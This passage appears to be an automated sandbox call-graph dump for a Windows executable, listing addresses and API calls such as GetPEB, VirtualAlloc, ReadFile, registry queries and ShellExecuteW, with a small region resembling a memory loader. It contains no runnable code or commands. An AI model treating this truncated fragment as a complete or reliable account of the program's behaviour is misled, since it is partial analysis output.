VirtualAlloc 85107->85108 85107->85113 85114 3ee0460 CloseHandle 85107->85114 85115 3ee0470 VirtualFree 85107->85115 85120 3ee1170 GetPEB 85107->85120 85109 3ee037a ReadFile 85108->85109 85108->85113 85112 3ee0398 VirtualAlloc 85109->85112 85109->85113 85110 3ee054c VirtualFree 85111 3ee055a 85110->85111 85111->85102 85112->85107 85112->85113 85113->85110 85113->85111 85114->85107 85115->85107 85116->85102 85122 3ee1110 GetPEB 85117->85122 85119 3ede2db 85119->85107 85121 3ee119a 85120->85121 85121->85106 85123 3ee113a 85122->85123 85123->85119 85124 479921 85125 479965 85124->85125 85126 479c79 85124->85126 85125->85126 85128 47997b 85125->85128 85173 4781ae 140 API calls 85126->85173 85130 479985 85128->85130 85131 4799a3 85128->85131 85129 479c8d 85166 4781ae 140 API calls 85130->85166 85133 4799ad 85131->85133 85137 4799cb _wcslen 85131->85137 85167 4781ae 140 API calls 85133->85167 85134 479999 85136 4799c1 85138 40fff0 75 API calls 85137->85138 85144 479a32 85137->85144 85139 4799e1 85138->85139 85141 479a0a 85139->85141 85139->85144 85140 479a8f 85142 479ad5 VariantInit 85140->85142 85160 479c28 85140->85160 85168 4781ae 140 API calls 85141->85168 85149 479aee _memset 85142->85149 85144->85140 85145 479a91 85144->85145 85169 476a8a 134 API calls _realloc 85144->85169 85170 4781ae 140 API calls 85145->85170 85148 479a28 85150 479bc5 85149->85150 85151 479b6c 85149->85151 85152 479ba1 85149->85152 85155 467626 132 API calls 85150->85155 85151->85152 85153 479b73 85151->85153 85172 4781ae 140 API calls 85152->85172 85171 4781ae 140 API calls 85153->85171 85164 479bd3 85155->85164 85157 479bb2 VariantClear 85157->85160 85158 479b8b VariantClear 85158->85160 85159 479c19 VariantClear 85159->85160 85161 479c42 VariantClear 85160->85161 85162 479c3c VariantClear 85160->85162 85163 479c4d 85160->85163 85161->85160 85161->85163 85162->85161 85164->85159 85165 467626 132 API calls 85164->85165 85165->85164 85166->85134 85167->85136 85168->85148 85169->85144 85170->85140 85171->85158 85172->85157 85173->85129 85174 452dae 85175 4092c0 VariantClear 85174->85175 85176 452dbd 85175->85176 85177 41171a 75 API calls 85176->85177 85178 452dc4 85177->85178 85179 452e02 85178->85179 85180 452dcf 85178->85180 85181 41171a 75 API calls 85179->85181 85182 41171a 75 API calls 85180->85182 85183 452e09 85181->85183 85184 452dd9 _memset 85182->85184 85185 40116e 85186 401119 DefWindowProcW 85185->85186 85187 3ee0000 85188 3eddc50 GetPEB 85187->85188 85189 3ee00ec 85188->85189 85201 3edfef0 85189->85201 85191 3ee0115 CreateFileW 85193 3ee0169 85191->85193 85194 3ee0164 85191->85194 85193->85194 85195 3ee0180 VirtualAlloc 85193->85195 85195->85194 85196 3ee019e ReadFile 85195->85196 85196->85194 85197 3ee01b9 85196->85197 85198 3edeef0 13 API calls 85197->85198 85199 3ee01ec 85198->85199 85200 3ee020f ExitProcess 85199->85200 85200->85194 85202 3edfef9 Sleep 85201->85202 85203 3edff07 85202->85203 85204 429212 85209 410b90 85204->85209 85207 411421 __cinit 74 API calls 85208 42922f 85207->85208 85210 410b9a __write_nolock 85209->85210 85211 41171a 75 API calls 85210->85211 85212 410c31 GetModuleFileNameW 85211->85212 85226 413db0 85212->85226 85214 410c66 _wcsncat 85229 413e3c 85214->85229 85217 41171a 75 API calls 85218 410ca3 _wcscpy 85217->85218 85219 410cd1 RegOpenKeyExW 85218->85219 85220 429bc3 RegQueryValueExW 85219->85220 85221 410cf7 85219->85221 85222 429cd9 RegCloseKey 85220->85222 85224 429bf2 _wcscat _wcslen _wcsncpy 85220->85224 85221->85207 85223 41171a 75 API calls 85223->85224 85224->85223 85225 429cd8 85224->85225 85225->85222 85232 413b95 85226->85232 85262 41abec 85229->85262 85233 413c2f 85232->85233 85239 413bae 85232->85239 85234 413d60 85233->85234 85235 413d7b 85233->85235 85258 417f23 67 API calls __getptd_noexit 85234->85258 85260 417f23 67 API calls __getptd_noexit 85235->85260 85238 413d65 85241 413cfb 85238->85241 85259 417ebb 6 API calls 2 library calls 85238->85259 85239->85233 85242 413c1d 85239->85242 85254 41ab19 67 API calls __swprintf 85239->85254 85241->85214 85242->85233 85251 413c9b 85242->85251 85255 41ab19 67 API calls __swprintf 85242->85255 85244 413d03 85244->85233 85244->85241 85246 413d8e 85244->85246 85245 413cb9 85245->85233 85248 413cd6 85245->85248 85256 41ab19 67 API calls __swprintf 85245->85256 85261 41ab19 67 API calls __swprintf 85246->85261 85248->85233 85248->85241 85250 413cef 85248->85250 85257 41ab19 67 API calls __swprintf 85250->85257 85251->85244 85251->85245 85254->85242 85255->85251 85256->85248 85257->85241 85258->85238 85260->85238 85261->85241 85263 41ac02 85262->85263 85264 41abfd 85262->85264 85271 417f23 67 API calls __getptd_noexit 85263->85271 85264->85263 85269 41ac22 85264->85269 85266 41ac07 85272 417ebb 6 API calls 2 library calls 85266->85272 85268 410c99 85268->85217 85269->85268 85273 417f23 67 API calls __getptd_noexit 85269->85273 85271->85266 85273->85266 85274 401230 85275 401241 _memset 85274->85275 85276 4012c5 85274->85276 85289 401be0 85275->85289 85278 40126b 85279 4012ae KillTimer SetTimer 85278->85279 85280 42aa61 85278->85280 85281 401298 85278->85281 85279->85276 85284 42aa8b Shell_NotifyIconW 85280->85284 85285 42aa69 Shell_NotifyIconW 85280->85285 85282 4012a2 85281->85282 85283 42aaac 85281->85283 85282->85279 85286 42aaf8 Shell_NotifyIconW 85282->85286 85287 42aad7 Shell_NotifyIconW 85283->85287 85288 42aab5 Shell_NotifyIconW 85283->85288 85284->85279 85285->85279 85286->85279 85287->85279 85288->85279 85290 401bfb 85289->85290 85291 401cde 85289->85291 85311 4013a0 85290->85311 85291->85278 85294 42a9a0 LoadStringW 85297 42a9bb 85294->85297 85295 401c18 85296 4021e0 75 API calls 85295->85296 85298 401c2d 85296->85298 85317 40df50 75 API calls 85297->85317 85300 401c3a 85298->85300 85301 42a9cd 85298->85301 85300->85297 85302 401c44 85300->85302 85318 40d3b0 75 API calls 2 library calls 85301->85318 85316 40d3b0 75 API calls 2 library calls 85302->85316 85305 42a9dc 85306 42a9f0 85305->85306 85308 401c53 _memset _wcscpy _wcsncpy 85305->85308 85319 40d3b0 75 API calls 2 library calls 85306->85319 85310 401cc2 Shell_NotifyIconW 85308->85310 85309 42a9fe 85310->85291 85312 41171a 75 API calls 85311->85312 85313 4013c4 85312->85313 85314 401380 75 API calls 85313->85314 85315 4013d3 85314->85315 85315->85294 85315->85295 85316->85308 85317->85308 85318->85305 85319->85309 85320 40c170 85321 40c17b 85320->85321 85328 40c1a5 _realloc 85320->85328 85322 40c1d6 85321->85322 85323 40c19b 85321->85323 85321->85328 85325 41171a 75 API calls 85322->85325 85329 4034b0 85323->85329 85326 40c1df 85325->85326 85327 41171a 75 API calls 85326->85327 85326->85328 85327->85328 85330 4034b9 85329->85330 85331 4034bd 85329->85331 85330->85328 85332 41171a 75 API calls 85331->85332 85333 42a0ba 85331->85333 85334 4034fe moneypunct _realloc 85332->85334 85334->85328 85335 40f110 RegOpenKeyExW 85336 40f13c RegQueryValueExW RegCloseKey 85335->85336 85337 40f15f 85335->85337 85336->85337 85338 416193 85375 41718c 85338->85375 85340 41619f GetStartupInfoW 85342 4161c2 85340->85342 85376 41aa31 HeapCreate 85342->85376 85344 416212 85378 416e29 GetModuleHandleW 85344->85378 85348 416223 __RTC_Initialize 85412 41b669 85348->85412 85351 416231 85352 41623d GetCommandLineW 85351->85352 85481 4117af 67 API calls 3 library calls 85351->85481 85427 42235f GetEnvironmentStringsW 85352->85427 85355 41623c 85355->85352 85356 41624c 85433 4222b1 GetModuleFileNameW 85356->85433 85358 416256 85359 416261 85358->85359 85482 4117af 67 API calls 3 library calls 85358->85482 85437 422082 85359->85437 85363 416272 85450 41186e 85363->85450 85366 416279 85368 416284 __wwincmdln 85366->85368 85484 4117af 67 API calls 3 library calls 85366->85484 85456 40d7f0 85368->85456 85371 4162b3 85486 411a4b 67 API calls _doexit 85371->85486 85374 4162b8 ___lock_fhandle 85375->85340 85377 416206 85376->85377 85377->85344 85479 41616a 67 API calls 3 library calls 85377->85479 85379 416e44 85378->85379 85380 416e3d 85378->85380 85381 416fac 85379->85381 85382 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85379->85382 85487 41177f Sleep GetModuleHandleW 85380->85487 85497 416ad5 70 API calls 2 library calls 85381->85497 85388 416e97 TlsAlloc 85382->85388 85385 416e43 85385->85379 85387 416218 85387->85348 85480 41616a 67 API calls 3 library calls 85387->85480 85388->85387 85389 416ee5 TlsSetValue 85388->85389 85389->85387 85390 416ef6 85389->85390 85488 411a69 6 API calls 3 library calls 85390->85488 85392 416efb 85393 41696e __encode_pointer 6 API calls 85392->85393 85394 416f06 85393->85394 85395 41696e __encode_pointer 6 API calls 85394->85395 85396 416f16 85395->85396 85397 41696e __encode_pointer 6 API calls 85396->85397 85398 416f26 85397->85398 85399 41696e __encode_pointer 6 API calls 85398->85399 85400 416f36 85399->85400 85489 41828b InitializeCriticalSectionAndSpinCount ___lock_fhandle 85400->85489 85402 416f43 85402->85381 85403 4169e9 __decode_pointer 6 API calls 85402->85403 85404 416f57 85403->85404 85404->85381 85490 416ffb 85404->85490 85407 4169e9 __decode_pointer 6 API calls 85408 416f8a 85407->85408 85408->85381 85409 416f91 85408->85409 85496 416b12 67 API calls 5 library calls 85409->85496 85411 416f99 GetCurrentThreadId 85411->85387 85516 41718c 85412->85516 85414 41b675 GetStartupInfoA 85415 416ffb __calloc_crt 67 API calls 85414->85415 85422 41b696 85415->85422 85416 41b8b4 ___lock_fhandle 85416->85351 85417 41b831 GetStdHandle 85421 41b7fb 85417->85421 85418 41b896 SetHandleCount 85418->85416 85419 416ffb __calloc_crt 67 API calls 85419->85422 85420 41b843 GetFileType 85420->85421 85421->85416 85421->85417 85421->85418 85421->85420 85518 4189e6 InitializeCriticalSectionAndSpinCount ___lock_fhandle 85421->85518 85422->85416 85422->85419 85422->85421 85424 41b77e 85422->85424 85424->85416 85424->85421 85425 41b7a7 GetFileType 85424->85425 85517 4189e6 InitializeCriticalSectionAndSpinCount ___lock_fhandle 85424->85517 85425->85424 85428 422370 85427->85428 85429 422374 85427->85429 85428->85356 85430 416fb6 __malloc_crt 67 API calls 85429->85430 85431 422395 _realloc 85430->85431 85432 42239c FreeEnvironmentStringsW 85431->85432 85432->85356 85434 4222e6 _wparse_cmdline 85433->85434 85435 416fb6 __malloc_crt 67 API calls 85434->85435 85436 422329 _wparse_cmdline 85434->85436 85435->85436 85436->85358 85438 42209a _wcslen 85437->85438 85442 416267 85437->85442 85439 416ffb __calloc_crt 67 API calls 85438->85439 85445 4220be _wcslen 85439->85445 85440 422123 85441 413a88 ___crtsetenv 67 API calls 85440->85441 85441->85442 85442->85363 85483 4117af 67 API calls 3 library calls 85442->85483 85443 416ffb __calloc_crt 67 API calls 85443->85445 85444 422149 85446 413a88 ___crtsetenv 67 API calls 85444->85446 85445->85440 85445->85442 85445->85443 85445->85444 85448 422108 85445->85448 85519 426349 67 API calls __swprintf 85445->85519 85446->85442 85448->85445 85520 417d93 10 API calls 2 library calls 85448->85520 85452 41187c __IsNonwritableInCurrentImage 85450->85452 85521 418486 85452->85521 85453 41189a __initterm_e 85454 411421 __cinit 74 API calls 85453->85454 85455 4118b9 __IsNonwritableInCurrentImage __initterm 85453->85455 85454->85455 85455->85366 85457 431bcb 85456->85457 85458 40d80c 85456->85458 85459 4092c0 VariantClear 85458->85459 85460 40d847 85459->85460 85525 40eb50 85460->85525 85463 40d877 85528 411ac6 67 API calls 4 library calls 85463->85528 85466 40d888 85529 411b24 67 API calls __swprintf 85466->85529 85468 40d891 85530 40f370 SystemParametersInfoW SystemParametersInfoW 85468->85530 85470 40d89f 85531 40d6d0 GetCurrentDirectoryW 85470->85531 85472 40d8a7 SystemParametersInfoW 85473 40d8d4 85472->85473 85474 40d8cd FreeLibrary 85472->85474 85475 4092c0 VariantClear 85473->85475 85474->85473 85476 40d8dd 85475->85476 85477 4092c0 VariantClear 85476->85477 85478 40d8e6 85477->85478 85478->85371 85485 411a1f 67 API calls _doexit 85478->85485 85479->85344 85480->85348 85481->85355 85482->85359 85483->85363 85484->85368 85485->85371 85486->85374 85487->85385 85488->85392 85489->85402 85493 417004 85490->85493 85492 416f70 85492->85381 85492->85407 85493->85492 85494 417022 Sleep 85493->85494 85498 422452 85493->85498 85495 417037 85494->85495 85495->85492 85495->85493 85496->85411 85497->85387 85499 42245e ___lock_fhandle 85498->85499 85500 422476 85499->85500 85510 422495 _memset 85499->85510 85511 417f23 67 API calls __getptd_noexit 85500->85511 85502 42247b 85512 417ebb 6 API calls 2 library calls 85502->85512 85504 422507 HeapAlloc 85504->85510 85505 418407 __lock 66 API calls 85505->85510 85506 42248b ___lock_fhandle 85506->85493 85510->85504 85510->85505 85510->85506 85513 41a74c 5 API calls 2 library calls 85510->85513 85514 42254e LeaveCriticalSection _doexit 85510->85514 85515 411afc 6 API calls __decode_pointer 85510->85515 85511->85502 85513->85510 85514->85510 85515->85510 85516->85414 85517->85424 85518->85421 85519->85445 85520->85448 85522 41848c 85521->85522 85523 41696e __encode_pointer 6 API calls 85522->85523 85524 4184a4 85522->85524 85523->85522 85524->85453 85569 40eb70 85525->85569 85528->85466 85529->85468 85530->85470 85573 401f80 85531->85573 85533 40d6f1 IsDebuggerPresent 85534 431a9d MessageBoxA 85533->85534 85535 40d6ff 85533->85535 85536 431ab6 85534->85536 85535->85536 85537 40d71f 85535->85537 85675 403e90 75 API calls 3 library calls 85536->85675 85643 40f3b0 85537->85643 85541 40d73a GetFullPathNameW 85673 401440 127 API calls _wcscat 85541->85673 85543 40d77a 85544 40d782 85543->85544 85545 431b09 SetCurrentDirectoryW 85543->85545 85546 40d78b 85544->85546 85676 43604b 6 API calls 85544->85676 85545->85544 85655 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85546->85655 85549 431b28 85549->85546 85551 431b30 GetModuleFileNameW 85549->85551 85553 431ba4 GetForegroundWindow ShellExecuteW 85551->85553 85554 431b4c 85551->85554 85556 40d7c7 85553->85556 85677 401b70 85554->85677 85555 40d795 85562 40d7a8 85555->85562 85663 40e1e0 85555->85663 85560 40d7d1 SetCurrentDirectoryW 85556->85560 85560->85472 85562->85556 85674 401000 Shell_NotifyIconW _memset 85562->85674 85563 431b66 85684 40d3b0 75 API calls 2 library calls 85563->85684 85566 431b72 GetForegroundWindow ShellExecuteW 85567 431b9f 85566->85567 85567->85556 85568 40eba0 LoadLibraryA GetProcAddress 85568->85463 85570 40d86e 85569->85570 85571 40eb76 LoadLibraryA 85569->85571 85570->85463 85570->85568 85571->85570 85572 40eb87 GetProcAddress 85571->85572 85572->85570 85685 40e680 85573->85685 85577 401fa2 GetModuleFileNameW 85703 40ff90 85577->85703 85579 401fbd 85715 4107b0 85579->85715 85582 401b70 75 API calls 85583 401fe4 85582->85583 85718 4019e0 85583->85718 85585 401ff2 85586 4092c0 VariantClear 85585->85586 85587 402002 85586->85587 85588 401b70 75 API calls 85587->85588 85589 40201c 85588->85589 85590 4019e0 76 API calls 85589->85590 85591 40202c 85590->85591 85592 401b70 75 API calls 85591->85592 85593 40203c 85592->85593 85726 40c3e0 85593->85726 85595 40204d 85596 40c060 75 API calls 85595->85596 85597 402061 85596->85597 85744 401a70 85597->85744 85599 40206e 85751 4115d0 85599->85751 85602 42c174 85604 401a70 75 API calls 85602->85604 85603 402088 85605 4115d0 __wcsicoll 79 API calls 85603->85605 85606 42c189 85604->85606 85607 402093 85605->85607 85609 401a70 75 API calls 85606->85609 85607->85606 85608 40209e 85607->85608 85610 4115d0 __wcsicoll 79 API calls 85608->85610 85611 42c1a7 85609->85611 85612 4020a9 85610->85612 85613 42c1b0 GetModuleFileNameW 85611->85613 85612->85613 85614 4020b4 85612->85614 85616 401a70 75 API calls 85613->85616 85615 4115d0 __wcsicoll 79 API calls 85614->85615 85617 4020bf 85615->85617 85618 42c1e2 85616->85618 85619 402107 85617->85619 85623 401a70 75 API calls 85617->85623 85628 42c20a _wcscpy 85617->85628 85776 40df50 75 API calls 85618->85776 85622 402119 85619->85622 85619->85628 85621 42c1f1 85624 401a70 75 API calls 85621->85624 85625 42c243 85622->85625 85759 40e7e0 85622->85759 85626 4020e5 _wcscpy 85623->85626 85627 42c201 85624->85627 85634 401a70 75 API calls 85626->85634 85627->85628 85630 401a70 75 API calls 85628->85630 85638 402148 85630->85638 85631 402132 85773 40d030 76 API calls 85631->85773 85633 40213e 85635 4092c0 VariantClear 85633->85635 85634->85619 85635->85638 85636 402184 85640 4092c0 VariantClear 85636->85640 85638->85636 85641 401a70 75 API calls 85638->85641 85774 40d030 76 API calls 85638->85774 85775 40e640 76 API calls 85638->85775 85642 402196 moneypunct 85640->85642 85641->85638 85642->85533 85644 42ccf4 _memset 85643->85644 85645 40f3c9 85643->85645 85648 42cd05 GetOpenFileNameW 85644->85648 86464 40ffb0 76 API calls moneypunct 85645->86464 85647 40f3d2 86465 410130 SHGetMalloc 85647->86465 85648->85645 85650 40d732 85648->85650 85650->85541 85650->85543 85651 40f3d9 86470 410020 88 API calls __wcsicoll 85651->86470 85653 40f3e7 86471 40f400 85653->86471 85656 42b9d3 85655->85656 85657 41025a LoadImageW RegisterClassExW 85655->85657 86518 443e8f EnumResourceNamesW LoadImageW 85656->86518 86517 4102f0 7 API calls 85657->86517 85660 40d790 85662 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85660->85662 85661 42b9da 85662->85555 85664 40e207 _memset 85663->85664 85665 40e262 85664->85665 85666 42aa14 DestroyIcon 85664->85666 85667 40e2a4 85665->85667 86519 43737d 84 API calls __wcsicoll 85665->86519 85666->85665 85669 40e2c0 Shell_NotifyIconW 85667->85669 85670 42aa50 Shell_NotifyIconW 85667->85670 85671 401be0 77 API calls 85669->85671 85672 40e2da 85671->85672 85672->85562 85673->85543 85674->85556 85675->85543 85676->85549 85678 401b76 _wcslen 85677->85678 85679 41171a 75 API calls 85678->85679 85682 401bc5 85678->85682 85680 401bad _realloc 85679->85680 85681 41171a 75 API calls 85680->85681 85681->85682 85683 40d3b0 75 API calls 2 library calls 85682->85683 85683->85563 85684->85566 85686 40c060 75 API calls 85685->85686 85687 401f90 85686->85687 85688 402940 85687->85688 85689 40294a __write_nolock 85688->85689 85690 4021e0 75 API calls 85689->85690 85692 402972 85690->85692 85702 4029a4 85692->85702 85777 401cf0 85692->85777 85693 402ae0 75 API calls 85693->85702 85694 402a8c 85695 401b70 75 API calls 85694->85695 85701 402abe 85694->85701 85697 402ab3 85695->85697 85696 401b70 75 API calls 85696->85702 85781 40d970 75 API calls 2 library calls 85697->85781 85698 401cf0 75 API calls 85698->85702 85701->85577 85702->85693 85702->85694 85702->85696 85702->85698 85780 40d970 75 API calls 2 library calls 85702->85780 85782 40f5e0 85703->85782 85706 40ffa6 85706->85579 85708 42b6d8 85711 42b6e6 85708->85711 85838 434fe1 85708->85838 85710 413a88 ___crtsetenv 67 API calls 85712 42b6f5 85710->85712 85711->85710 85713 434fe1 106 API calls 85712->85713 85714 42b702 85713->85714 85714->85579 85716 41171a 75 API calls 85715->85716 85717 401fd6 85716->85717 85717->85582 85719 401a03 85718->85719 85724 4019e5 85718->85724 85720 401a1a 85719->85720 85719->85724 86442 404260 76 API calls 85720->86442 85722 4019ff 85722->85585 85723 401a26 85723->85585 85724->85722 86441 404260 76 API calls 85724->86441 85727 40c3e4 85726->85727 85728 40c42c 85726->85728 85729 40c3f0 85727->85729 85730 42a475 85727->85730 85731 42a422 85728->85731 85732 40c435 85728->85732 86443 4042f0 75 API calls __cinit 85729->86443 86448 453155 75 API calls 85730->86448 85734 42a427 85731->85734 85735 42a445 85731->85735 85736 40c441 85732->85736 85737 42a455 85732->85737 85743 40c3fb 85734->85743 86445 453155 75 API calls 85734->86445 86446 453155 75 API calls 85735->86446 86444 4042f0 75 API calls __cinit 85736->86444 86447 453155 75 API calls 85737->86447 85743->85595 85745 401a90 85744->85745 85746 401a77 85744->85746 85748 4021e0 75 API calls 85745->85748 85747 401a8d 85746->85747 86449 404080 75 API calls _realloc 85746->86449 85747->85599 85750 401a9c 85748->85750 85750->85599 85752 4115e1 85751->85752 85753 411650 85751->85753 85756 40207d 85752->85756 86450 417f23 67 API calls __getptd_noexit 85752->86450 86452 4114bf 79 API calls 3 library calls 85753->86452 85756->85602 85756->85603 85757 4115ed 86451 417ebb 6 API calls 2 library calls 85757->86451 85760 40e7f7 85759->85760 85761 42b34a 85759->85761 86453 40e8f0 85760->86453 86459 40e300 85761->86459 85765 42b34f 85766 40e8f0 76 API calls 85765->85766 85769 42b35b 85766->85769 85767 41171a 75 API calls 85770 40e8ac 85767->85770 85768 40e809 85768->85767 85768->85769 85769->85631 85771 41171a 75 API calls 85770->85771 85772 40e8b7 85771->85772 85772->85631 85773->85633 85774->85638 85775->85638 85776->85621 85778 402ae0 75 API calls 85777->85778 85779 401cf7 85778->85779 85779->85692 85780->85702 85781->85701 85842 40f580 85782->85842 85784 40f5f8 _strcat moneypunct 85850 40f6d0 85784->85850 85789 42b2ee 85879 4151b0 85789->85879 85791 40f679 85791->85789 85792 40f681 85791->85792 85866 414e94 85792->85866 85796 40f68b 85796->85706 85801 452574 85796->85801 85798 42b31d 85885 415484 85798->85885 85800 42b33d 85802 41557c _fseek 105 API calls 85801->85802 85803 4525df 85802->85803 86386 4523ce 85803->86386 85806 4525fc 85806->85708 85807 4151b0 __fread_nolock 81 API calls 85808 45261d 85807->85808 85809 4151b0 __fread_nolock 81 API calls 85808->85809 85810 45262e 85809->85810 85811 4151b0 __fread_nolock 81 API calls 85810->85811 85812 452649 85811->85812 85813 4151b0 __fread_nolock 81 API calls 85812->85813 85814 452666 85813->85814 85815 41557c _fseek 105 API calls 85814->85815 85816 452682 85815->85816 85817 4138ba _malloc 67 API calls 85816->85817 85818 45268e 85817->85818 85819 4138ba _malloc 67 API calls 85818->85819 85820 45269b 85819->85820 85821 4151b0 __fread_nolock 81 API calls 85820->85821 85822 4526ac 85821->85822 85823 44afdc GetSystemTimeAsFileTime 85822->85823 85824 4526bf 85823->85824 85825 4526d5 85824->85825 85826 4526fd 85824->85826 85829 413a88 ___crtsetenv 67 API calls 85825->85829 85827 452704 85826->85827 85828 45275b 85826->85828 86392 44b195 85827->86392 85831 413a88 ___crtsetenv 67 API calls 85828->85831 85832 4526df 85829->85832 85834 452759 85831->85834 85835 413a88 ___crtsetenv 67 API calls 85832->85835 85833 452753 85837 413a88 ___crtsetenv 67 API calls 85833->85837 85834->85708 85836 4526e8 85835->85836 85836->85708 85837->85834 85839 434feb 85838->85839 85841 434ff1 85838->85841 85840 414e94 __fcloseall 106 API calls 85839->85840 85840->85841 85841->85711 85843 429440 85842->85843 85844 40f589 _wcslen 85842->85844 85845 40f58f WideCharToMultiByte 85844->85845 85846 40f5d8 85845->85846 85847 40f5ad 85845->85847 85846->85784 85848 41171a 75 API calls 85847->85848 85849 40f5bb WideCharToMultiByte 85848->85849 85849->85784 85851 40f6dd _strlen 85850->85851 85898 40f790 85851->85898 85854 414e06 85917 414d40 85854->85917 85856 40f666 85856->85789 85857 40f450 85856->85857 85860 40f45a _strcat _realloc __write_nolock 85857->85860 85858 4151b0 __fread_nolock 81 API calls 85858->85860 85860->85858 85861 42936d 85860->85861 85865 40f531 85860->85865 86000 41557c 85860->86000 85862 41557c _fseek 105 API calls 85861->85862 85863 429394 85862->85863 85864 4151b0 __fread_nolock 81 API calls 85863->85864 85864->85865 85865->85791 85867 414ea0 ___lock_fhandle 85866->85867 85868 414ed1 85867->85868 85869 414eb4 85867->85869 85872 415965 __lock_file 68 API calls 85868->85872 85876 414ec9 ___lock_fhandle 85868->85876 86139 417f23 67 API calls __getptd_noexit 85869->86139 85871 414eb9 86140 417ebb 6 API calls 2 library calls 85871->86140 85874 414ee9 85872->85874 86123 414e1d 85874->86123 85876->85796 86208 41511a 85879->86208 85881 4151c8 85882 44afdc 85881->85882 86379 4431e0 85882->86379 85884 44affd 85884->85798 85886 415490 ___lock_fhandle 85885->85886 85887 4154bb 85886->85887 85888 41549e 85886->85888 85889 415965 __lock_file 68 API calls 85887->85889 86383 417f23 67 API calls __getptd_noexit 85888->86383 85891 4154c3 85889->85891 85893 4152e7 __ftell_nolock 71 API calls 85891->85893 85892 4154a3 86384 417ebb 6 API calls 2 library calls 85892->86384 85895 4154cf 85893->85895 86385 4154e8 LeaveCriticalSection LeaveCriticalSection _ftell 85895->86385 85897 4154b3 ___lock_fhandle 85897->85800 85899 40f7ae _memset 85898->85899 85901 40f628 85899->85901 85902 415258 85899->85902 85901->85854 85903 415285 85902->85903 85904 415268 85902->85904 85903->85904 85905 41528c 85903->85905 85913 417f23 67 API calls __getptd_noexit 85904->85913 85915 41c551 103 API calls 14 library calls 85905->85915 85907 41526d 85914 417ebb 6 API calls 2 library calls 85907->85914 85910 4152b2 85911 41527d 85910->85911 85916 4191c9 101 API calls 7 library calls 85910->85916 85911->85899 85913->85907 85915->85910 85916->85911 85918 414d4c ___lock_fhandle 85917->85918 85919 414d5f 85918->85919 85922 414d95 85918->85922 85969 417f23 67 API calls __getptd_noexit 85919->85969 85921 414d64 85970 417ebb 6 API calls 2 library calls 85921->85970 85936 41e28c 85922->85936 85925 414d9a 85926 414da1 85925->85926 85927 414dae 85925->85927 85971 417f23 67 API calls __getptd_noexit 85926->85971 85929 414dd6 85927->85929 85930 414db6 85927->85930 85954 41dfd8 85929->85954 85972 417f23 67 API calls __getptd_noexit 85930->85972 85933 414d74 ___lock_fhandle @_EH4_CallFilterFunc@8 85933->85856 85937 41e298 ___lock_fhandle 85936->85937 85938 418407 __lock 67 API calls 85937->85938 85944 41e2a6 85938->85944 85939 41e322 85940 416fb6 __malloc_crt 67 API calls 85939->85940 85943 41e32c 85940->85943 85942 41e3b0 ___lock_fhandle 85942->85925 85953 41e31b 85943->85953 85979 4189e6 InitializeCriticalSectionAndSpinCount ___lock_fhandle 85943->85979 85944->85939 85946 418344 __mtinitlocknum 67 API calls 85944->85946 85944->85953 85977 4159a6 68 API calls __lock 85944->85977 85978 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85944->85978 85946->85944 85948 41e351 85949 41e35c 85948->85949 85950 41e36f EnterCriticalSection 85948->85950 85951 413a88 ___crtsetenv 67 API calls 85949->85951 85950->85953 85951->85953 85974 41e3bb 85953->85974 85956 41dffb __wopenfile 85954->85956 85955 41e015 85984 417f23 67 API calls __getptd_noexit 85955->85984 85956->85955 85968 41e1e9 85956->85968 85986 4136bc 79 API calls 2 library calls 85956->85986 85958 41e01a 85985 417ebb 6 API calls 2 library calls 85958->85985 85960 41e247 85981 425db0 85960->85981 85964 41e1e2 85964->85968 85987 4136bc 79 API calls 2 library calls 85964->85987 85966 41e201 85966->85968 85988 4136bc 79 API calls 2 library calls 85966->85988 85968->85955 85968->85960 85969->85921 85971->85933 85972->85933 85973 414dfc LeaveCriticalSection LeaveCriticalSection _ftell 85973->85933 85980 41832d LeaveCriticalSection 85974->85980 85976 41e3c2 85976->85942 85977->85944 85978->85944 85979->85948 85980->85976 85989 425ce4 85981->85989 85983 414de1 85983->85973 85984->85958 85986->85964 85987->85966 85988->85968 85992 425cf0 ___lock_fhandle 85989->85992 85990 425d03 85991 417f23 __swprintf 67 API calls 85990->85991 85993 425d08 85991->85993 85992->85990 85994 425d41 85992->85994 85995 417ebb __swprintf 6 API calls 85993->85995 85996 4255c4 __tsopen_nolock 132 API calls 85994->85996 85999 425d17 ___lock_fhandle 85995->85999 85997 425d5b 85996->85997 85998 425d82 __sopen_helper LeaveCriticalSection 85997->85998 85998->85999 85999->85983 86004 415588 ___lock_fhandle 86000->86004 86001 415596 86031 417f23 67 API calls __getptd_noexit 86001->86031 86003 4155c4 86013 415965 86003->86013 86004->86001 86004->86003 86006 41559b 86032 417ebb 6 API calls 2 library calls 86006->86032 86012 4155ab ___lock_fhandle 86012->85860 86014 415977 86013->86014 86015 415999 EnterCriticalSection 86013->86015 86014->86015 86016 41597f 86014->86016 86017 4155cc 86015->86017 86018 418407 __lock 67 API calls 86016->86018 86019 4154f2 86017->86019 86018->86017 86020 415502 86019->86020 86023 415512 86019->86023 86088 417f23 67 API calls __getptd_noexit 86020->86088 86022 415524 86051 41486c 86022->86051 86023->86022 86034 4152e7 86023->86034 86024 415507 86033 4155f7 LeaveCriticalSection LeaveCriticalSection _ftell 86024->86033 86031->86006 86033->86012 86035 41531a 86034->86035 86036 4152fa 86034->86036 86038 41453a __fileno 67 API calls 86035->86038 86089 417f23 67 API calls __getptd_noexit 86036->86089 86040 415320 86038->86040 86039 4152ff 86090 417ebb 6 API calls 2 library calls 86039->86090 86042 41efd4 __locking 71 API calls 86040->86042 86043 415335 86042->86043 86044 4153a9 86043->86044 86046 415364 86043->86046 86050 41530f 86043->86050 86091 417f23 67 API calls __getptd_noexit 86044->86091 86047 41efd4 __locking 71 API calls 86046->86047 86046->86050 86048 415404 86047->86048 86049 41efd4 __locking 71 API calls 86048->86049 86048->86050 86049->86050 86050->86022 86052 4148a7 86051->86052 86053 414885 86051->86053 86057 41453a 86052->86057 86053->86052 86054 41453a __fileno 67 API calls 86053->86054 86055 4148a0 86054->86055 86092 41c3cf 101 API calls 5 library calls 86055->86092 86058 41455e 86057->86058 86059 414549 86057->86059 86063 41efd4 86058->86063 86093 417f23 67 API calls __getptd_noexit 86059->86093 86061 41454e 86094 417ebb 6 API calls 2 library calls 86061->86094 86064 41efe0 ___lock_fhandle 86063->86064 86065 41f003 86064->86065 86066 41efe8 86064->86066 86068 41f011 86065->86068 86072 41f052 86065->86072 86115 417f36 67 API calls 